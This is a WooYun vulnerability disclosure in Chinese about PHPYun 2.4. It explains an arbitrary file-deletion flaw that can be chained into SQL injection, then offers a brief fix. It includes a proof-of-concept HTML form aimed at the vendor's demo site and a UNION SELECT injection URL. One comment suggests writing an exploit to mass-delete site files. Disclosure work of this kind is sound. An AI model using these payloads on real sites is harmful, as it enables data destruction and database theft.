当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012960

漏洞标题:PHP云人才系统 PHPYun任意文件删除

相关厂商:PHP100

漏洞作者: hacx

提交时间:2012-10-01 21:16

修复时间:2012-11-15 21:16

公开时间:2012-11-15 21:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-11-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PHPYun任意文件删除,从而导致sql注射。

详细说明:

PHP云人才系统 PHPYun为 PHP100旗下产品。
下载源码:http://www.phpyun.com/phpyun_2.4_GBK_Beta.zip 2.4版本的
先看根目录下index.php文件:

<?php
include(dirname(__FILE__)."/global.php");
********省略***********
$act = $_GET['act'];
$task = $_GET['task'];
********省略***********
require(MODEL_PATH.'class/common.php');
require("model/".$act.'.class.php');//包含model/下的class.php文件
$conclass=$act.'_controller';
$actfunc=$task.'_action';
$views=new $conclass($phpyun,$db,$db_config["def"],"index");//实例化一个类
if(!method_exists($views,$actfunc)){
$views->DoException();
}
$views->$actfunc();//访问url:index.php?act=ajax&task=delupload将调用model/ajax.class.php中ajax_controller类的delupload_action函数
?>


来到根目录下的global.php

error_reporting(0);//关闭了错误显示
........................................
if($_GET[act]!="admin_template"){
include(CONFIG_PATH."db.safety.php");//包含了data/db.safety.php文件
}


再看data/db.safety.php文件

<?php
function quotesGPC() {
$_POST = array_map("addSlash", $_POST);
$_GET = array_map("addSlash", $_GET);
$_COOKIE = array_map("addSlash", $_COOKIE);
}
function addSlash($el) {
if (is_array($el))
return array_map("addSlash", $el);
else
return addslashes($el);
}
function gpc2sql($str) {
$arr=array(" and "=>" an d "," or "=>" Or ","%20"=>"","select"=>"Select","update"=>"Update","count"=>"Count","chr"=>"Chr","truncate"=>"Truncate","union"=>"Union","delete"=>"Delete","insert"=>"Insert");
foreach($arr as $key=>$v){
$str = preg_replace('/'.$key.'/isU',$v,$str);
}
return $str;
}
function common_htmlspecialchars($str){
$str = preg_replace('/&(?!#[0-9]+;)/s', '&amp;', $str);
$str = str_replace(
array('&','<','>','"','and',"'"),
array("&amp;",'&lt;','&gt;','&quot;','an d',"&acute;"),
$str);
return gpc2sql($str);
}
foreach($_POST as $id=>$v){
$_POST[$id]=common_htmlspecialchars($v);
}
foreach($_GET as $id=>$v){
if(!is_array($v))
$v=substr(strip_tags($v),0,80);
$_GET[$id]=common_htmlspecialchars($v);
}
foreach($_COOKIE as $id=>$v){
$v=substr(strip_tags($v),0,52);
$_COOKIE[$id]=common_htmlspecialchars($v);
}
?>


可以看到对$_POST、$_GET、$_COOKIE的值都进行了过滤、转义,XSS、sql注射都很难了。
好了那么问题出在mode/ajax.class.php。
来看mode/ajax.class.php中的delupload_action函数

function delupload_action(){
if(!$this->uid || !$this->username || $_COOKIE["usertype"]!=2){//需要先注册一个企业用户再登录,企业用户usertype为2,个人用户需要修改cookie
echo 0;die;
}else{
$dir=$_POST[str][0]; //POST表单中设置[str][0]的值就可以删除任意文件了
echo @unlink(".".$dir); //调用了unlink函数删除文件
}
}


构造html文件:

<form action="http://demo.phpyun.com/index.php?act=ajax&task=delupload" method="post"><br>
要删除的文件:<input type="text" name="str[0]" value="/robots.txt" size=120><br>
<input type="submit" value="提交">
</form>


提交后robots.txt文件删除了




如果删除/data/phpyun.lock可以重新安装
如果删除/data/db.safety.php则没有进行对$_POST、$_GET、$_COOKIE进行过滤了
比如删除/data/db.safety.php后可通过mode/ajax.class.php中getzphcom_action函数进行sql注入:

function getzphcom_action(){
extract($_GET); //$jobid=$_GET["jobid"]
if(!$jobid){
$arr['status']=0;
$arr['content']=iconv("gbk","utf-8","您还没有职位,<a href='index.php?act=login&usertype=2'>请先登录</a>");
}else{
$row=$this->obj->DB_select_all("company_job","`id` in ($jobid)");//$jobid没有单引号,闭合前面的)即可进行注入
foreach($row as $v){
$data.=$v[name].'<br>';
}
$arr['status']=1;
$arr['content']=iconv("gbk","utf-8",$data);
}
echo json_encode($arr);
}


注入:访问/index.php?act=ajax&task=getzphcom&jobid=-1) UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
本地测试注入成功,demo.phpyun.com测试注入不成功。

漏洞证明:

修复方案:

只允许用户删除用户上传的特定文件。

版权声明:转载请注明来源 hacx@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-10-01 21:39 | Errorera ( 普通白帽子 | Rank:112 漏洞数:21 | 我们应该在犯错误的情况下学习!)

    果断写exp批量删除common.php over

  2. 2012-11-16 09:54 | ca3tie1 ( 路人 | Rank:18 漏洞数:4 | castiel)

    二次利用很好很强大!!

  3. 2012-11-29 14:33 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

    很强大!!!